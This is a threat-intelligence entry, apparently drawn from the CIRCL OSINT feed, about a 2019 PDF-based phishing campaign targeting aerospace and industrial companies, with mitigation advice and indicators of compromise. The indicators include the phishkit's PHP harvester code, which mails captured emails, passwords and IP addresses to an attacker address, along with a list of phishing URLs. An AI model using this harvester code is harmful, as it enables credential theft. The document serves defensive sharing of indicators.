
Targeted phishing - PDF documents / phishkit

Severity: Low
Published: Thu May 16 2019 (05/16/2019, 00:00:00 UTC)
Source: CIRCL OSINT Feed
Vendor/Project: type
Product: osint

Description

Targeted phishing - PDF documents / phishkit

AI-Powered Analysis

Machine-generated threat intelligence

Last updated: 03/06/2026, 21:57:59 UTC

Technical Analysis

The threat described is a targeted phishing campaign that uses PDF documents as the primary vector for delivering malicious content or links, often packaged within phishkits. Phishkits are pre-built toolkits that let attackers assemble convincing phishing campaigns quickly. This campaign aligns with MITRE ATT&CK techniques T1193 (Spearphishing Attachment) and T1192 (Spearphishing Link): attackers send emails with malicious PDF attachments or embedded links designed to deceive recipients into opening them. Upon interaction, victims may be led to credential-harvesting sites, malware downloads, or other malicious outcomes. The campaign was identified through OSINT sources, specifically the CIRCL OSINT feed, with a moderate certainty level (50%). No specific software vulnerabilities or patches are associated with it, and no exploits in the wild have been reported, which suggests this is primarily a social engineering threat rather than a technical exploit. The threat is ongoing because phishing tactics remain effective. The lack of detailed technical indicators or affected versions limits attribution and signature-based detection, so behavioral and heuristic detection methods are needed. The threat is tagged with multiple TLP levels (white, clear, green), indicating broad sharing permissions and relevance to multiple audiences. Overall, this threat represents a common but persistent phishing vector that leverages PDF documents to target individuals or organizations selectively.

Potential Impact

The primary impact of this threat is the potential compromise of user credentials, unauthorized access to sensitive systems, and possible deployment of malware if the phishing attempt succeeds. Organizations may face data breaches, financial loss, reputational damage, and operational disruption. Since the attack relies on social engineering, the success rate depends heavily on user awareness and email security controls. The absence of known technical exploits reduces the risk of widespread automated compromise but does not diminish the threat to high-value targets susceptible to spearphishing. The use of PDF documents can bypass some traditional email filters if not properly configured, increasing the chance of delivery. The impact is global, affecting any organization or individual relying on email communications and PDF workflows, particularly in sectors like finance, government, healthcare, and critical infrastructure where targeted phishing is prevalent.

Mitigation Recommendations

To mitigate this threat effectively, organizations should implement advanced email filtering solutions capable of inspecting PDF attachments for malicious content and embedded links. Deploy sandboxing technologies to analyze suspicious PDFs in a controlled environment before delivery. Enhance user training programs focused on recognizing spearphishing attempts, especially those involving document attachments. Enforce multi-factor authentication (MFA) to reduce the risk of credential compromise leading to unauthorized access. Regularly update and patch email clients and PDF readers to minimize exploitation of any underlying vulnerabilities. Implement domain-based message authentication, reporting, and conformance (DMARC), SPF, and DKIM to reduce email spoofing. Monitor network traffic for unusual outbound connections that may indicate successful phishing exploitation. Establish incident response plans specifically addressing phishing incidents to enable rapid containment and remediation. Finally, leverage threat intelligence feeds to stay informed about emerging phishing campaigns and tactics.


Technical Details

Uuid
5cdd3938-7134-4908-9552-173cc0a8016e
Original Timestamp
1764973857

Indicators of Compromise

Yara

rule PDF_LIFT { strings: $a = "Rect[ 195.05 428.59 411.79 489.67]" condition: all of them }
rule PDF_JAT_AUTHOR { strings: $a = "<</Author(JAT)" condition: all of them }
Generic yara rule to find the common JAT author.

Email

jatboss6@gmail.com
Email used to send credentials (found in the sendmail.php file)

Url

https://lulufabllc.com/doc/cdnrg.com/index.php
Phishing link
https://helpersserer.com/wp-inc/Response/www.tenova.com/index.php
Phishing link
https://www.arbutusroutes.com/document/standardaero.com/
Phishing link
https://www.arbutusroutes.com/document/utc.com/
Phishing link
https://www.arbutusroutes.com/document/gd.com/
Phishing link
https://www.arbutusroutes.com/document/airbus.com/
Phishing link
http://office.online-drive.ml/push-doc/cproduct_brochure_fg.php
Older phishing link; the login page was mirrored on Wed, 12 Sep 2018 06:29:39 GMT
https://drpianotellsall.com/atkinspiano.com/wwwwww/sma/index.php
Phishing link
https://arbutusroutes.com/ssl/akhurst.com/index.php
Phishing link

Target org

airbus.com
tenova.com
standardaero.com
gd.com
utc.com
cdnrg.com
akhurst.com

File

New-Updated-docs.zip
sendmail.php

Mime type

PDF document, version 1.5
PDF document, version 1.5
PDF document, version 1.5
PDF document, version 1.5
PDF document, version 1.7
CDFV2 Microsoft Outlook Message

Text

Adobe-Standard-Encoding
Malicious
Suspect
JATBOSS
<?php
if(isset($_SERVER['HTTP_X_REAL_IP'])){ $ip = $_SERVER['HTTP_X_REAL_IP']; }else{ $ip=$_SERVER['REMOTE_ADDR']; }
$message .= "|----------| E M A I L |--------------|\n";
$message .= "Online: ".$_POST['email']."\n";
$message .= "pass: ".$_POST['pwd']."\n";
$message .= "|--------------- I N F O | I P -------------------|\n";
$message .= "|Client IP: ".$ip."\n";
$message .= "|--- http://www.geoiptool.com/?IP=$ip ----\n";
$message .= "User Agent : ".$useragent."\n";
$message .= "|----------- HACKED BY JATBOSS --------------|\n";
$send = "jatboss6@gmail.com";
$subject = "$country | $ip";
{ mail("$send", "$subject", $message); }
?>
PHP
Malicious
1/56
0/58
2/59
1/54
10/61
1/60
0/58

Gender

Prefer not to say

Datetime

2019-05-16T08:54:33
2019-05-13T02:37:30
2019-05-13T02:37:43
2019-05-15T17:45:13
2019-05-16T09:42:04
2019-05-15T20:41:35
2019-05-13T02:37:29

Link

https://www.virustotal.com/file/f2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a/analysis/1557996873/
https://www.virustotal.com/file/56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936/analysis/1557715050/
https://www.virustotal.com/file/28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02/analysis/1557715063/
https://www.virustotal.com/file/0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132/analysis/1557942313/
https://www.virustotal.com/file/9c4f9755fc183f6ad4ad4d600a0a3ed9230900152245f924b9106202ce543c58/analysis/1557999724/
https://www.virustotal.com/file/c052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2/analysis/1557952895/
https://www.virustotal.com/file/ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73/analysis/1557715049/

Threat ID: 6933b2702271496a0fa16ea3

Added to database: 12/6/2025, 4:34:56 AM

Last enriched: 3/6/2026, 9:57:59 PM

Last updated: 3/24/2026, 5:04:25 AM
